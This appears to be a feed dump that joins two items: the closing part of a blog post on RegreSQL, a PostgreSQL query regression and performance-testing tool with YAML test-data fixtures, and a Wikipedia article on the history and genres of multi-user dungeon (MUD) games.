Creating baselines for queries:

  ./
  Created baseline: album-by-artist_list-albums-by-artist.1.json
  Created baseline: album-by-artist_list-albums-by-artist.2.json
  Created baseline: album-tracks_list-tracks-by-albumid.1.json
  Created baseline: album-tracks_list-tracks-by-albumid.2.json
  Created baseline: artist_top-artists-by-album.1.json
  Created baseline: genre-topn_genre-top-n.top-1.json
  Created baseline: genre-topn_genre-top-n.top-3.json
  Created baseline: genre-tracks_tracks-by-genre.json

Baselines have been created successfully!
Baseline files are stored in: regresql/baselines

the test command not only tests the regressions to the captured times, but also detects the common bad patterns in query execution plans. For now it provides warnings for detection of sequential scans - both on their and/or with nested loops and multiple sort operations. I believe this alone might provide a valuable insights and reduce the mishaps in production. It's also a place where further development of RegreSQL will take place.

To demonstrate this, let's review the test output with the baselines.

Connecting to 'postgres://appuser:password123@192.168.139.28/cdstore_test'… ✓

Running regression tests...

✓ album-by-artist_list-albums-by-artist.1.json (0.00s)
✓ album-by-artist_list-albums-by-artist.2.json (0.00s)
✓ album-by-artist_list-albums-by-artist.1.cost (22.09 <= 22.09 * 110%) (0.00s)
  ⚠️  Sequential scan detected on table 'artist'
    Suggestion: Consider adding an index if this table is large or this query is frequently executed
  ⚠️  Nested loop join with sequential scan detected
    Suggestion: Add index on join column to avoid repeated sequential scans
✓ album-by-artist_list-albums-by-artist.2.cost (22.09 <= 22.09 * 110%) (0.00s)
  ⚠️  Sequential scan detected on table 'artist'
    Suggestion: Consider adding an index if this table is large or this query is frequently executed
  ⚠️  Nested loop join with sequential scan detected
    Suggestion: Add index on join column to avoid repeated sequential scans

✓ album-tracks_list-tracks-by-albumid.1.json (0.00s)
✓ album-tracks_list-tracks-by-albumid.2.json (0.00s)
✓ album-tracks_list-tracks-by-albumid.1.cost (8.23 <= 8.23 * 110%) (0.00s)
✓ album-tracks_list-tracks-by-albumid.2.cost (8.23 <= 8.23 * 110%) (0.00s)

✓ artist_top-artists-by-album.1.json (0.00s)
✓ artist_top-artists-by-album.1.cost (35.70 <= 35.70 * 110%) (0.00s)
  ⚠️  Multiple sequential scans detected on tables: album, artist
    Suggestion: Review query and consider adding indexes on filtered/joined columns

✓ genre-topn_genre-top-n.top-1.json (0.00s)
✓ genre-topn_genre-top-n.top-3.json (0.00s)
✓ genre-topn_genre-top-n.top-1.cost (6610.59 <= 6610.59 * 110%) (0.00s)
  ⚠️  Multiple sequential scans detected on tables: genre, artist
    Suggestion: Review query and consider adding indexes on filtered/joined columns
  ⚠️  Multiple sort operations detected (2 sorts)
    Suggestion: Consider composite indexes for ORDER BY clauses to avoid sorting
  ⚠️  Nested loop join with sequential scan detected
    Suggestion: Add index on join column to avoid repeated sequential scans
✓ genre-topn_genre-top-n.top-3.cost (6610.59 <= 6610.59 * 110%) (0.00s)
  ⚠️  Multiple sequential scans detected on tables: artist, genre
    Suggestion: Review query and consider adding indexes on filtered/joined columns
  ⚠️  Multiple sort operations detected (2 sorts)
    Suggestion: Consider composite indexes for ORDER BY clauses to avoid sorting
  ⚠️  Nested loop join with sequential scan detected
    Suggestion: Add index on join column to avoid repeated sequential scans

✓ genre-tracks_tracks-by-genre.json (0.00s)
✓ genre-tracks_tracks-by-genre.cost (37.99 <= 37.99 * 110%) (0.00s)
  ⚠️  Multiple sequential scans detected on tables: genre, track
    Suggestion: Review query and consider adding indexes on filtered/joined columns

Results: 16 passed (0.00s)

As you can see, despite from not having baseline, RegreSQL is able to detect the basic bad patterns that should be addressed before queries can be considered "production ready".

In some cases, having the detection of sequential scans, or just tracking query costs baselines might be considered undesirable, which would lead to false positives. RegreSQL enables this to be addressed by query metadata as demonstrated below.

-- name: query_name
-- metadata: key1=value1, key2=value2
SELECT ...;

At this point RegreSQL recognizes

  • notest to skip the query testing altogether (not just cost tracking)
  • nobaseline to skip cost tracking
  • noseqscanwarn to keep cost tracking but disable sequential scan warnings
  • and difffloattolerance to cost failure threshold (default 10% at the moment).
-- name: query_name
-- regresql: notest, nobaseline
-- regresql: noseqscanwarn
-- regresql: difffloattolerance:0.25
-- query that can vary in cost by 20% without being considered a failure
SELECT ...;

ORM enters the room

ORMs abstract away SQL, but they still generate it - and that generated SQL can have performance problems you won't catch until production. Consider this common scenario: you start with a simple SQLAlchemy query that works fine, then months later add eager loading for related data:

orders = (
    session.query(Order)
    .filter(Order.user_id == user_id)
    .options(
        joinedload(Order.user),
        joinedload(Order.shipping_address),
        selectinload(Order.items)  # NEW: Load order items
    )
    .all()
)

That innocent selectinload(Order.items) generates a separate query - and without an index on order_items.order_id , it performs a sequential scan.

RegreSQL can catch this by intercepting ORM-generated SQL using SQLAlchemy's event system:

@event.listens_for(engine, "before_cursor_execute")
def capture_sql(conn, cursor, statement, *args):
    captured_queries.append(statement)

Run your ORM code, capture the SQL, save it as a .sql file, and test it with RegreSQL. The performance baseline testing will flag the missing index before it hits production. This is currently experimental, but ORM integration is a key area for RegreSQL's future development.

Test Data Management

Up until now we have covered how RegreSQL verifies query correctness and tracks performance regressions. But there's a critical prerequisite we've only skimmed through. Every regression test needs consistent, reproducible data. Change the data, change their cardinality, and your expected results become meaningless. Your performance baselines drift. Your tests become flaky.

Traditional approach to create test data might involve

  • Database dumps become unmanageable - 500MB files you can't review, can't understand, that break with every schema migration, and whose data becomes stale as production evolves. Which version of the dump are your tests even using?
  • SQL scripts might be better than dumps, but still imperative and hard to maintain. You end up with INSERT statements scattered across multiple files, managing foreign keys manually, and debugging constraint violations.
  • Factories in application code might work great for integration tests, but we're testing SQL directly. Do you really want to maintain parallel data generation in your application language just for SQL tests?
  • Shared test database is the synonym for classic "works on my machine" problem. State leaks between tests. Parallel execution becomes impossible. Debugging is a nightmare.

What we need is something that's declarative (what data, not how to insert it), reproducible (similar data every time), composable (build complex scenarios from simple pieces), and scalable (from 10 rows to 100,000).

This is where next improvement in RegreSQL's fixture system comes in. Think of it as infrastructure-as-code for your test data. You describe the data you need in YAML files, and RegreSQL handles the rest - dependencies, cleanup, foreign keys, and even realistic data generation at scale.

RegreSQL's fixture system lets you define test data in YAML files stored in regresql/fixtures/ . Here's a simple example

  fixture: basic_users
  description: a handful of test users
  cleanup: rollback

  data:
    - table: users
      rows:
        - id: 1
          email: alice@example.com
          name: Alice Anderson
          created_at: 2024-01-15
        - id: 2
          email: bob@example.com
          name: Bob Builder
          created_at: 2024-02-20

To use this fixture in your tests, reference it in the query's plan file ( regresql/plans/get-user.yaml ) you can just reference the fixture

  fixtures:
    - basic_users

  "1":
    email: alice@example.com

  "2":
    email: bob@example.com

And when you run regresql test , the fixture is automatically loaded before the query executes, and cleaned up afterward. No manual setup scripts, no state leakage between tests. But it does not stop with static fixtures. When you want to test queries against realistic volumes you can use range of data generators including

  • sequences, random integer, decimal, string, uuid, email and name generators
  • date_between for generating random timestamps within a range
  • foreign key references to be able to reuse data from other table's fixtures
  • range to select value from predefined sources
  • Go template support
 fixture: realistic_orders
  generate:
    - table: customers
      count: 1000
      columns:
        id:
          generator: sequence
          start: 1
        email:
          generator: email
          domain: shop.example.com
        name:
          generator: name
          type: full
        created_at:
          generator: date_between
          start: "2023-01-01"
          end: "2024-12-31"

    - table: orders
      count: 5000
      columns:
        id:
          generator: sequence
          start: 1
        customer_id:
          generator: int
          min: 1
          max: 1000
        amount:
          generator: decimal
          min: 10.00
          max: 999.99
          precision: 2
        order_date:
          generator: date_between
          start: "2023-01-01"
          end: "2024-12-31"

This generates 1,000 customers and 5,000 orders with realistic-looking data - names, emails, dates, and amounts that feel production-like.

The fixtures are also stackable and can be build on top of each other. For example if you need to make sure users fixtures are created before orders fixtures, just declare the dependency (the already planned improvement is to include the support automatic foreign-key detection to avoid ID hard-coding). RegreSQL loads fixtures in dependency order and handles cleanup in reverse.

  fixture: orders_with_shipping
  depends_on:
    - basic_users

  data:
    - table: orders
      rows:
        - id: 101
          user_id: 1  # References Alice from basic_users
          total: 99.99
          status: shipped

Should the available options for fixtures (manual data or data generators) not be enough, you always have options to use good old SQL based data generation.

  fixture: mixed_setup
  description: Combine SQL with YAML and generated data
  cleanup: rollback

  # SQL executes first (either as file or inline)
  sql:
    - file: sql/setup_schema.sql
    - inline: "INSERT INTO config (key, value) VALUES ('version', '1.0');"

  # followed YAML data
  data:
    - table: users
      rows:
        - id: 1
          email: admin@example.com

  # and finally generated data
  generate:
    - table: orders
      count: 100
      columns:
        id:
          generator: sequence
          start: 1
        user_id:
          generator: int
          min: 1
          max: 1

RegreSQL provides commands to inspect and validate your fixtures

  # List all available fixtures
  regresql fixtures list

  # Show fixture details and dependencies
  regresql fixtures show realistic_orders

  # Validate fixture definitions
  regresql fixtures validate

  # Show dependency graph
  regresql fixtures deps

  # Apply fixture manually (for debugging)
  regresql fixtures apply basic_users

The fixture system has been design to transforms test data from a maintenance burden into a documented, version-controlled process. Your YAML files become the single source of truth for what data your tests need, making it easy to understand test scenarios and maintain test data as the application evolves.

RegreSQL future

Introducing a new open source project is an ambitious goal, and RegreSQL is just starting up. Despite the fork being in works for almost 2 years. In coming weeks and months I plan further improvements, as well as better documentation and more tutorials. The project is maintained as part of my boringSQL brand, where it's vital component for building SQL Labs which (as I sincerely hope) will provide a foundation for its further development.

At the same time RegreSQL is an attempt to give back to welcoming PostgreSQL community, make developer user experience slightly better if possible and (just maybe) provide one more argument against the case that SQL queries are not testable.

RegreSQL is available at GitHub - feel free to open issue, or drop me email about the project at radim@boringsql.com or connect on LinkedIn .

Multi-User Dungeon (MUD)

Hacker News
en.wikipedia.org
2025-11-14 06:57:22
Comments...
Original Article

This article is about a type of online computer game. For the first game called "MUD" or "Multi-User Dungeon", see MUD1 .

"MCCP" redirects here. For the class of chemical compounds, see Chlorinated paraffins .

A screenshot of a MUD

A multi-user dungeon ( MUD , ), also known as a multi-user dimension or multi-user domain , [ 1 ] [ 2 ] is a multiplayer real-time virtual world , usually text-based or storyboarded . MUDs combine elements of role-playing games , hack and slash , player versus player , interactive fiction , and online chat . Players can read or view descriptions of rooms, objects, other players, and non-player characters , and perform actions in the virtual world that are typically also described. Players typically interact with each other and the world by typing commands that resemble a natural language , as well as using a character typically called an avatar . [ 3 ]

Traditional MUDs implement a role-playing video game set in a fantasy world populated by fictional races and monsters , with players choosing classes in order to gain specific skills or powers. The objective of this sort of game is to slay monsters , explore a fantasy world, complete quests, go on adventures, create a story by roleplaying , and advance the created character. Many MUDs were fashioned around the dice-rolling rules of the Dungeons & Dragons series of games.

Such fantasy settings for MUDs are common, while many others have science fiction settings or are based on popular books, movies, animations, periods of history, worlds populated by anthropomorphic animals, and so on. Not all MUDs are games; some are designed for educational purposes, while others are purely chat environments , and the flexible nature of many MUD servers leads to their occasional use in areas ranging from computer science research to geoinformatics to medical informatics to analytical chemistry . [ 4 ] [ 5 ] [ 6 ] [ 7 ] MUDs have attracted the interest of academic scholars from many fields, including communications , sociology , law , and economics . [ 8 ] [ 9 ] [ 10 ] At one time, there was interest from the United States military in using them for teleconferencing. [ 11 ]

Most MUDs are run as hobbies and are free to play; some may accept donations or allow players to purchase virtual items , while others charge a monthly subscription fee. MUDs can be accessed via standard telnet clients, or specialized MUD clients, which are designed to improve the user experience. Numerous games are listed at various web portals, such as The Mud Connector .

The history of modern massively multiplayer online role-playing games (MMORPGs) like EverQuest and Ultima Online , and related virtual world genres such as the social virtual worlds exemplified by Second Life , can be traced directly back to the MUD genre. [ 10 ] [ 12 ] Indeed, before the invention of the term MMORPG, games of this style were simply called graphical MUDs . A number of influential MMORPG designers began as MUD developers and/or players [ 13 ] (such as Raph Koster , Brad McQuaid , [ 14 ] Matt Firor, and Brian Green [ 15 ] ) or were involved with early MUDs (like Mark Jacobs and J. Todd Coleman ).

Will Crowther 's Adventure

Colossal Cave Adventure , created in 1975 by Will Crowther on a DEC PDP-10 computer, was the first widely played adventure game . The game was significantly expanded in 1976 by Don Woods . Also called Adventure , it contained many D&D features and references, including a computer controlled dungeon master . [ 16 ] [ 17 ]

Numerous dungeon crawlers were created on the PLATO system at the University of Illinois and other American universities that used PLATO, beginning in 1975. Among them were " pedit5 ", "oubliette", " moria ", "avatar", "krozair", "dungeon", " dnd ", "crypt", and "drygulch". By 1978–79, these games were heavily in use on various PLATO systems, and exhibited a marked increase in sophistication in terms of 3D graphics, storytelling, user involvement, team play, and depth of objects and monsters in the dungeons. [ 18 ]

Inspired by Adventure , a group of students at MIT in the summer of 1977 wrote a game for the PDP-10 minicomputer; called Zork , it became quite popular on the ARPANET . Zork was ported , under the filename DUNGEN ("dungeon"), to FORTRAN by a programmer working at DEC in 1978. [ 19 ] [ 1 ]

In 1978 Roy Trubshaw , a student at the University of Essex in the UK, started working on a multi-user adventure game in the MACRO-10 assembly language for a DEC PDP-10. He named the game MUD ( Multi-User Dungeon ), in tribute to the Dungeon variant of Zork , which Trubshaw had greatly enjoyed playing. [ 20 ] Trubshaw converted MUD to BCPL (the predecessor of C ), before handing over development to Richard Bartle , a fellow student at the University of Essex, in 1980. [ 21 ] [ 22 ] [ 23 ] The game revolved around gaining points till one achieved the Wizard rank, giving the character immortality and special powers over mortals.

Wider access and early derivatives

[ edit ]

MUD , better known as Essex MUD and MUD1 in later years, ran on the University of Essex network, and became more widely accessible when a guest account was set up that allowed users on JANET (a British academic X.25 computer network) to connect on weekends and between the hours of 2 AM and 8 AM on weekdays. [ 24 ] It became the first Internet multiplayer online role-playing game in 1980 and started the online gaming industry as a whole [ 25 ] when the university connected its internal network to ARPANET . [ 26 ]

The original MUD game was closed down in late 1987, [ 27 ] reportedly under pressure from CompuServe , to whom Richard Bartle had licensed the game. This left MIST , a derivative of MUD1 with similar gameplay, as the only remaining MUD running on the University of Essex network, becoming one of the first of its kind to attain broad popularity. MIST ran until the machine that hosted it, a PDP-10 , was superseded in early 1991. [ 28 ]

1985 saw the origin of a number of projects inspired by the original MUD . These included Gods by Ben Laurie , a MUD1 clone that included online creation in its endgame, and which became a commercial MUD in 1988; [ 29 ] and MirrorWorld , [ 30 ] a tolkienesque MUD started by Pip Cordrey who gathered some people on a BBS he ran to create a MUD1 clone that would run on a home computer.

Neil Newell, an avid MUD1 player, started programming his own MUD called SHADES during Christmas 1985, because MUD1 was closed down during the holidays. Starting out as a hobby, SHADES became accessible in the UK as a commercial MUD via British Telecom's Prestel and Micronet networks. [ 31 ] A scandal on SHADES led to the closure of Micronet , as described in Indra Sinha 's net-memoir, The Cybergypsies . [ 32 ]

At the same time, Compunet started a project named Multi-User Galaxy Game as a science fiction alternative to MUD1 , a copy of which they were running on their system at the time. When one of the two programmers left CompuNet, the remaining programmer, Alan Lenton, decided to rewrite the game from scratch and named it Federation II (at the time no Federation I existed). The MUD was officially launched in 1989. [ 33 ] Federation II was later picked up by AOL, where it became known simply as Federation: Adult Space Fantasy . Federation later left AOL to run on its own after AOL began offering unlimited service.

Other early MUD-like games

[ edit ]

In 1978, around the same time Roy Trubshaw wrote MUD , Alan E. Klietz wrote a game called Scepter (Scepter of Goth), and later called Milieu using Multi- Pascal on a CDC Cyber 6600 series mainframe which was operated by the Minnesota Educational Computing Consortium . [ 34 ] Klietz ported Milieu to an IBM XT in 1983, naming the new port Scepter of Goth . Scepter supported 10 to 16 simultaneous users, typically connecting in by modem. It was the first commercial MUD; [ 35 ] franchises were sold to a number of locations. Scepter was first owned and run by GamBit (of Minneapolis, Minnesota ), founded by Bob Alberti. GamBit's assets were later sold to Interplay Productions . [ 36 ] [ 37 ]

In 1984, Mark Peterson wrote The Realm of Angmar , beginning as a clone of Scepter of Goth . In 1994, Peterson rewrote The Realm of Angmar , adapting it to MS-DOS (the basis for many dial-in BBS systems), and renamed it Swords of Chaos . For a few years this was a popular form of MUD, hosted on a number of BBS systems, until widespread Internet access eliminated most BBSes. [ citation needed ]

In 1984, Mark Jacobs created and deployed a commercial gaming site, Gamers World . The site featured two games coded and designed by Jacobs, a MUD called Aradath (which was later renamed, upgraded and ported to GEnie as Dragon's Gate ) and a 4X science-fiction game called Galaxy , which was also ported to GEnie . At its peak, the site had about 100 monthly subscribers to both Aradath and Galaxy . GEnie was shut down in the late 1990s, although Dragon's Gate was later brought to AOL before it was finally released on its own. Dragon's Gate was closed on February 10, 2007. [ 38 ]

In the summer of 1980, University of Virginia classmates John Taylor and Kelton Flinn wrote Dungeons of Kesmai , a six player game inspired by Dungeons & Dragons which used roguelike ASCII graphics. They founded the Kesmai company in 1982 and in 1985 an enhanced version of Dungeons of Kesmai , Island of Kesmai , was launched on CompuServe . Later, its 2-D graphical descendant Legends of Kesmai was launched on AOL in 1996. The games were retired commercially in 2000. [ 39 ]

The popularity of MUDs of the University of Essex tradition escalated in the United States during the late 1980s when affordable personal computers with 300 to 2400 bit/s modems enabled role-players to log into multi-line BBSs and online service providers such as CompuServe . During this time it was sometimes said that MUD stands for "Multi Undergraduate Destroyer" due to their popularity among college students and the amount of time devoted to them. [ 40 ]

Avalon: The Legend Lives was published by Yehuda Simmons in 1989. It was the first persistent game world of its kind without the traditional hourly resets [ 41 ] and points-based puzzle solving progression systems. [ 42 ] Avalon introduced equilibrium and balance (cooldowns), skill-based player vs player combat and concepts such as player-run governments and player housing. [ 43 ]

In 2004, significant usages of MUDs included "online gaming, education,...socializing", and religious rituals or other religious activities. [ 3 ]

The first popular MUD codebase was AberMUD, written in 1987 by Alan Cox , named after the University of Wales, Aberystwyth . Alan Cox had played the original University of Essex MUD, and the gameplay was heavily influenced by it. [ 44 ] AberMUD was initially written in B for a Honeywell L66 mainframe under GCOS3/TSS. In late 1988 it was ported to C , which enabled it to spread rapidly to many Unix platforms upon its release in 1989. AberMUD's popularity resulted in several inspired works, the most notable of which were TinyMUD , LPMud , and DikuMUD . [ 45 ]

Monster was a multi-user adventure game created by Richard Skrenta for the VAX and written in VMS Pascal. It was publicly released in November 1988. [ 46 ] [ 47 ] Monster was disk-based and modifications to the game were immediate. Monster pioneered the approach of allowing players to build the game world , setting new puzzles or creating dungeons for other players to explore. [ 48 ] Monster, which comprised about 60,000 lines of code, had many features which appeared to be designed to allow Colossal Cave Adventure to work in it. Though there never were many network-accessible Monster servers, it inspired James Aspnes to create a stripped-down version of Monster which he called TinyMUD. [ 49 ]

TinyMUD, written in C and released in late 1989, spawned a number of descendants , including TinyMUCK and TinyMUSH . TinyMUCK version 2 contained a full programming language named MUF (Multi-User Forth ), while MUSH greatly expanded the command interface. To distance itself from the combat-oriented traditional MUDs it was said that the "D" in TinyMUD stood for Multi-User "Domain" or "Dimension"; this, along with the eventual popularity of acronyms other than MUD (such as MUCK, MUSH, MUSE, and so on) for this kind of server, led to the eventual adoption of the term MU* to refer to the TinyMUD family . [ 1 ] [ 2 ] UberMUD, UnterMUD, and MOO were inspired by TinyMUD but are not direct descendants. [ 50 ]

TinyMUD is also used to refer to the first database run under the TinyMUD codebase, which is also known as TinyMUD Classic; [ 51 ] it ran from August 1989 to April 1990, and still comes back up every August during a holiday called Brigadoon Day, a reference to the Scottish village in the musical Brigadoon .

The first version of Hourglass was written by Yehuda Simmons and later Daniel James for Avalon: The Legend Lives which debuted in 1989 at the last of the London MUD mega Meets aptly named Adventure '89 [ 52 ] and initially hosted on the IOWA system. Initially written in ARM assembly language on the Acorn Archimedes 440, in 1994 it made the leap from the venerable Archimedes to Debian Linux on the PC and later Red Hat where, other than shifting to Ubuntu , it has remained ever since. An early version of Hourglass was also ported to the PC, named Vortex, by Ben Maizels in 1992.

Although written specifically for Avalon: The Legend Lives , it went on to spawn a number of games, including Avalon: The First Age , which ran from 1999 to 2014. The now defunct 1996 Age of Thrones and notably Achaea, Dreams of Divine Lands started life in Vortex prior to moving to its own Rapture engine. Hourglass continues to be developed as of 2016 and Avalon: The Legend Lives currently has 2,901,325 written words and 2,248,374 lines of game code (with 2,417,900 instructions). The original game came in at 1 KB in 1989, compared to 102 GB in January 2016.

In 1989, LPMud was developed by Lars Pensjö (hence the LP in LPMud). Pensjö had been an avid player of TinyMUD and AberMUD and wanted to create a world with the flexibility of TinyMUD and the gameplay of AberMUD. In order to accomplish this he wrote what is nowadays known as a virtual machine , which he called the LPMud driver, that ran the C-like LPC programming language used to create the game world. [ 53 ] Pensjö's interest in LPMud eventually waned and development was carried on by others such as Jörn "Amylaar" Rennecke , Felix "Dworkin" Croes , Tim "Beek" Hollebeek and Lars Düning. During the early 1990s, LPMud was one of the most popular MUD codebases. [ 54 ] Descendants of the original LPMud include MudOS , DGD , SWLPC , FluffOS , and the Pike programming language, the latter the work of long-time LPMud developer Fredrik "Profezzorn" Hübinette.

In 1990, the release of DikuMUD, which was inspired by AberMUD, led to a virtual explosion of hack and slash MUDs based upon its code. DikuMUD inspired numerous derivative codebases , including CircleMUD , Merc , ROM , SMAUG , and GodWars . The original Diku team comprised Sebastian Hammer, Tom Madsen, Katja Nyboe, Michael Seifert, and Hans Henrik Staerfeldt. DikuMUD had a key influence on the early evolution of the MMORPG genre, with EverQuest (created by avid DikuMUD player Brad McQuaid [ 14 ] ) displaying such Diku-like gameplay that Verant developers were made to issue a sworn statement that no actual DikuMUD code was incorporated. [ 55 ] [ 56 ]

In 1987, David Whatley, having previously played Scepter of Goth and Island of Kesmai , founded Simutronics with Tom and Susan Zelinski. [ 57 ] In the same year they demonstrated a prototype of GemStone to GEnie . After a short-lived instance of GemStone II , GemStone III was officially launched in February 1990. GemStone III became available on AOL in September 1995, followed by the release of DragonRealms in February 1996. By the end of 1997 GemStone III and DragonRealms had become the first and second most played games on AOL. [ 58 ]

Game interface of Furcadia

The typical MUD will describe to the player the room or area they are standing in, listing the objects, players and non-player characters (NPCs) in the area, as well as all of the exits. To carry out a task the player would enter a text command such as take apple or attack dragon . Movement around the game environment is generally accomplished by entering the direction (or an abbreviation of it) in which the player wishes to move, for example typing north or just n would cause the player to exit the current area via the path to the north. [ 59 ]

MUD clients are computer applications that make the MUD telnet interface more accessible to users, [ 60 ] with features such as syntax highlighting , keyboard macros , and connection assistance. [ 61 ] [ 62 ] Prominent clients include TinyTalk, TinyFugue, TinTin++, and zMUD. [ 63 ] [ 64 ]

While there have been many variations in overall focus, gameplay and features in MUDs, some distinct sub-groups have formed that can be used to help categorize different game mechanics , game genres and non-game uses.

Hack and slash MUDs

[ edit ]

Perhaps the most common approach to game design in MUDs is to loosely emulate the structure of a Dungeons & Dragons campaign focused more on fighting and advancement than role-playing. When these MUDs restrict player-killing in favor of player versus environment conflict and questing , they are labeled hack and slash MUDs . This may be considered particularly appropriate since, due to the room-based nature of traditional MUDs, ranged combat is typically difficult to implement, resulting in most MUDs equipping characters mainly with close-combat weapons. This style of game was also historically referred to within the MUD genre as "adventure games", but video gaming as a whole has developed a meaning of " adventure game " that is greatly at odds with this usage.

Player versus player MUDs

[ edit ]

Most MUDs restrict player versus player combat, often abbreviated as PK (Player Killing). This is accomplished through hard coded restrictions and various forms of social intervention. MUDs without these restrictions are commonly known as PK MUDs . Taking this a step further are MUDs devoted solely to this sort of conflict, called pure PK MUDs, the first of which was Genocide in 1992. [ 65 ] Genocide 's ideas were influential in the evolution of player versus player online gaming. [ 66 ]

Roleplaying MUDs , generally abbreviated as RP MUDs , encourage or enforce that players act out the role of their playing characters at all times. Some RP MUDs provide an immersive gaming environment, while others only provide a virtual world with no game elements. MUDs where roleplay is enforced and the game world is heavily computer-modeled are sometimes known as roleplay intensive MUDs , or RPIMUDs . [ 67 ] In many cases, role-playing MUDs attempt to differentiate themselves from hack and slash types, by dropping the "MUD" name entirely, and instead using MUX (Multi-User Experience) or MUSH (Multi-User Shared Hallucination).

Further information: MMOSG

Social MUDs de-emphasize game elements in favor of an environment designed primarily for socializing. They are differentiated from talkers by retaining elements beyond online chat, typically online creation as a community activity and some element of role-playing . Often such MUDs have broadly defined contingents of socializers and roleplayers. Server software in the TinyMUD family , or MU* , is traditionally used to implement social MUDs.

A less-known MUD variant is the talker , a variety of online chat environment typically based on server software like ew-too or NUTS . Most of the early Internet talkers were LPMuds with the majority of the complex game machinery stripped away, leaving just the communication commands. The first Internet talker was Cat Chat in 1990.

Taking advantage of the flexibility of MUD server software, some MUDs are designed for educational purposes rather than gaming or chat. MicroMUSE is considered by author Lauren P. Burka to have been the first educational MUD, [ 68 ] but it can be argued [ weasel words ] that its evolution into this role was not complete until 1994, [ 69 ] which would make the first of many educational MOOs , Diversity University in 1993, also the first educational MUD. The MUD medium lends itself naturally to constructionist learning pedagogical approaches. The Mud Institute (TMI) was an LPMud opened in February 1992 as a gathering place for people interested in developing LPMud and teaching LPC after it became clear that Lars Pensjö had lost interest in the project. TMI focussed on both the LPMud driver and library, the driver evolving into MudOS. The TMI Mudlib was never officially released, but was influential in the development of other libraries.

A graphical MUD is a MUD that uses computer graphics to represent parts of the virtual world and its visitors. [ 70 ] A prominent early graphical MUD was Habitat , written by Randy Farmer and Chip Morningstar for Lucasfilm in 1985. [ 71 ] Some graphical MUDs require players to download a special client and the game's artwork, while others provide a rich experience by being website-based. Graphical MUDs range from simply enhancing the user interface (e.g. Wolfery provides an option to set the room picture, but otherwise remains a text-based interaction) to simulating 3D worlds with visual spatial relationships and customized avatar appearances (e.g. Ultima Online provides a rich point-and-click experience).

Games such as Meridian 59 , EverQuest , Ultima Online and Dark Age of Camelot were routinely called graphical MUDs in their earlier years. [ 72 ] [ 73 ] [ 74 ] [ 75 ] RuneScape was actually originally intended to be a text-based MUD, but graphics were added very early in development. [ 76 ] [ 77 ] However, with the increase in computing power and Internet connectivity during the late 1990s, and the shift of online gaming to the mass market, the term "graphical MUD" fell out of favor, being replaced by MMORPG ( massively multiplayer online role-playing game ) a term coined by Richard Garriott in 1997. [ 78 ]

Within a MUD's technical infrastructure, a mudlib (concatenation of "MUD library") [ 79 ] [ 80 ] defines the rules of the in-game world. [ 81 ] Examples of mudlibs include Ain Soph Mudlib , CDlib , [ 82 ] Discworld Mudlib , Lima Mudlib , [ 83 ] LPUniversity Mudlib , MorgenGrauen Mudlib , Nightmare Mudlib , and TMI Mudlib .

MUDs that include object-oriented programming can add complex features, such as adding elements to the game world and giving users more ways to interact with it, that MUDs without it cannot. [ 3 ]

MUD history has been preserved primarily through community sites and blogs and not through mainstream sources with journalistic repute. [ 84 ] As of the late 1990s, a website called The Mud Connector has served as a central and curated repository for active MUDs. [ 85 ] [ 86 ] [ 87 ] In 1995, The Independent reported that over 60,000 people regularly played about 600 MUDs, up from 170 MUDs three years prior. The Independent also noted distinct patterns of socialization within MUD communities. [ 88 ]

In 2004, MUDs were relatively popular in the United States and mostly text-based. [ 3 ]

Seraphina Brennan of Massively wrote that the MUD community was "in decline" as of 2009. [ 84 ]

Psychology and engagement

[ edit ]

Sherry Turkle developed a theory that the constant use (and in many cases, overuse) of MUDs allows users to develop different personalities in their environments. She uses examples, dating back to the text-based MUDs of the mid-1990s, showing college students who simultaneously live different lives through characters in separate MUDs, up to three at a time, all while doing schoolwork. The students claimed that it was a way to "shut off" their own lives for a while and become part of another reality. Turkle claims that this could present a psychological problem of identity for today's youths. [ 8 ]

" A Story About A Tree " is a short essay written by Raph Koster regarding the death of a LegendMUD player named Karyn, raising the subject of inter-human relationships in virtual worlds.

Observations of MUD-play show styles of play that can be roughly categorized. Achievers focus on concrete measurements of success such as experience points, levels , and wealth; Explorers investigate every nook and cranny of the game, and evaluate different game mechanical options; Socializers devote most of their energy to interacting with other players; and then there are Killers who focus on interacting negatively with other players, if permitted, killing the other characters or otherwise thwarting their play. Few players play only one way; most exhibit a diverse style. [ 89 ] According to Richard Bartle , "People go there as part of a hero's journey—a means of self-discovery". [ 90 ]

Research has suggested that various factors combine in MUDs to provide users with a sense of presence rather than simply communication. [ 91 ]

Grammatical usage and derived terms

[ edit ]

As a noun, the word MUD is variously written MUD, Mud, and mud, depending on speaker and context. It is also used as a verb, with to mud meaning to play or interact with a MUD and mudding referring to the act of doing so. [ 92 ] A mudder is one who MUDs. [ 93 ] Compound words and portmanteaux such as mudlist , mudsex , and mudflation [ 94 ] are also regularly coined. Puns on the "wet dirt" meaning of "mud" are endemic, as with, for example, the names of the ROM ( R ivers o f M UD), MUCK , MUSH , and CoffeeMUD codebases and the MUD Muddy Waters .

  1. ^ a b c Bartle 2003 , pp. 9–10, 741, [pp. 9-10] " TinyMUD was deliberately intended to be distanced from the prevailing hack-and-slay AberMUD style, and the 'D' in its name was said to stand for 'Dimension' (or, occasionally, 'Domain') rather than 'Dungeon;' this is the ultimate cause of the MUD/MU* distinction that was to arise some years later." [pp. 741] "The 'D' in MUD stands for 'Dungeon' [...] because the version of ZORK Roy played was a Fortran port called DUNGEN."
  2. ^ a b Hahn, Harley (1996). The Internet Complete Reference (2nd ed.). Osborne McGraw-Hill. pp. 553 . ISBN 978-0-07-882138-7 . [...] muds had evolved to the point where the original name was too confining, and people started to say that "MUD" stood for the more generic "Multi-User Dimension" or "Multi-User Domain".
  3. ^ a b c d Salamone, Frank A. (2004). Levinson, David (ed.). Encyclopedia of Religious Rites, Rituals, and Festivals . New York: Routledge . p. 300. ISBN 0-415-94180-6 .
  4. ^ Hansen, Geir Harald (July 31, 2002). A Distributed Persistent World Server using Dworkin's Generic Driver (PDF) (Cand. Scient. thesis). University of Oslo. Archived (PDF) from the original on May 13, 2011 . Retrieved April 14, 2010 .
  5. ^ Boring, Erich (December 3, 1993). PangaeaMud: An Online, Object-oriented Multiple User Interactive Geologic Database Tool (PDF) (Master's thesis). Miami University. Archived (PDF) from the original on July 20, 2011 . Retrieved May 3, 2010 .
  6. ^ Cruickshank, Don; De Roure, David (2004). "A Portal for Interacting with Context-aware Ubiquitous Systems" . Proceedings of First International Workshop on Advanced Context Modelling, Reasoning and Management : 96– 100. CiteSeerX 10.1.1.1.8402 . Archived from the original on November 21, 2010 . Retrieved October 14, 2010 .
